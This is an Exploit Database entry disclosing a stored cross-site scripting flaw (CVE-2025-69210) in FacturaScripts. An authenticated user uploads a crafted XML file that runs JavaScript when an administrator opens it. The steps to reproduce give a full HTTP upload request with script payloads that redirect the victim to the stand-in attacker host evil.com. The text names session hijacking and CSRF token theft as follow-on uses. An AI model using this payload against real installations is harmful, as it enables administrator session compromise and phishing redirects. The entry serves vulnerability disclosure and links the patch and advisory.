This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING FacturaScripts 2025.43 - XSS EDB-ID: 52517 CVE: 2025-69210 EDB Verified: Author: UVETTRIVEL007 Type: WEBAPPS Exploit: / Platform: MULTIPLE Date: 2026-04-29 Vulnerable App: # Exploit Title: FacturaScripts 2025.43 - XSS # Date: 30-12-2025 # Exploit Author: VETTRIVEL U # Author Profile: https://www.linkedin.com/in/vettrivel2006 # Vendor Homepage: https://facturascripts.com/ # Software Link: https://github.com/NeoRazorX/facturascripts # Affected Versions: <= 2025.4, = 2025.11, = 2025.41, = 2025.43 # Fixes: https://github.com/NeoRazorX/facturascripts/commit/e908ade21c84bdc9d51190057482316730c66146 # Patched Releases: https://github.com/NeoRazorX/facturascripts/releases/tag/v2025.7 # Tested on: Windows # GitHub Advisories: https://github.com/advisories/GHSA-2267-xqcf-gw2m # CVE Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69210 # CVE: CVE-2025-69210 ---------------------------------------------------------------------------------------- ## Description A stored cross-site scripting (XSS) vulnerability exists in the product file upload functionality. Authenticated users can upload crafted XML files containing executable JavaScript. These files are later rendered by the application without sufficient sanitization or content-type enforcement, allowing arbitrary JavaScript execution when the file is accessed. Because product files uploaded by regular users are visible to administrative users, this vulnerability can be leveraged to execute malicious JavaScript in an administrator’s browser session. ---------------------------------------------------------------------------------------- ## Steps to Reproduce 1. Log in as a normal user. 2. Navigate to the Warehouse → Products section: http://localhost:8888/ListProducto 3. Click New Product, enter the details (Example below), and save: Product Reference: XSS POC Description: Stored XSS PoC 4. Go to the Files section of the product. 5. Upload a crafted XML file containing JavaScript OR intercept the upload request using Burp Suite. 6. Modify the intercepted request body and inject the following payload as the uploaded XML file: POST /EditProducto?code=10 HTTP/1.1 Host: localhost:8888 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPU65l8Am0L64rWdo Cookie: [authenticated session cookies] ------ ------WebKitFormBoundaryPU65l8Am0L64rWdo Content-Disposition: form-data; name="new-files[]"; filename="xss.xml" Content-Type: text/xml <html> <head></head> <body> <something:script xmlns:something=" <something:script xmlns:something="http://www.w3.org/1999/xhtml"> alert("XSS"); if (confirm("Now Redirect POC")) { top.location.href = "https://evil.com"; } </something:script> <a:script xmlns:a=" <a:script xmlns:a="http://www.w3.org/1999/xhtml"> alert("XSS"); if (confirm("Now Redirect POC")) { location.href = "https://evil.com"; } </a:script> <info> <name> <value> <![CDATA[ <script> alert("XSS"); if (confirm("Now Redirect POC")) { window.location = "https://evil.com"; } </script> ]]> </value> </name> <description> <value>Hello</value> </description> <url> <value>http://google.com</value> </url> </info> </body> </html> ------ ------WebKitFormBoundaryPU65l8Am0L64rWdo-- 6. Forward the request and save the product file. 7. Open the uploaded file using the generated file URL, for example: http://localhost:8888/MyFiles/2025/12/9.xml?myft=2043dbb7389b8208d24f4dafb046ee5d71acbda9 Observe that: A popup with the message “XSS” is displayed. Upon clicking OK, the browser redirects to an attacker-controlled domain. ---------------------------------------------------------------------------------------- ## Impact - Arbitrary JavaScript execution in the victim’s browser. - Products created by normal users are visible to administrators. When an admin opens the malicious file, the payload executes in the admin’s session. - Phishing & Redirect Abuse: Attackers can redirect victims to malicious domains. - If extended, this vulnerability could be chained with: - Session hijacking - CSRF token theft - Admin API abuse - Trust Boundary Violation: User-controlled XML content is rendered as active content without sanitization. ## Reference https://github.com/vettrivel007/CVE-Disclosures/blob/main/CVE-2025-69210.md https://github.com/advisories/GHSA-2267-xqcf-gw2m ## Author Details: Exploit Author: VETTRIVEL U Author Profile: https://www.linkedin.com/in/vettrivel2006 GitHub Profile: https://github.com/vettrivel007/ Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.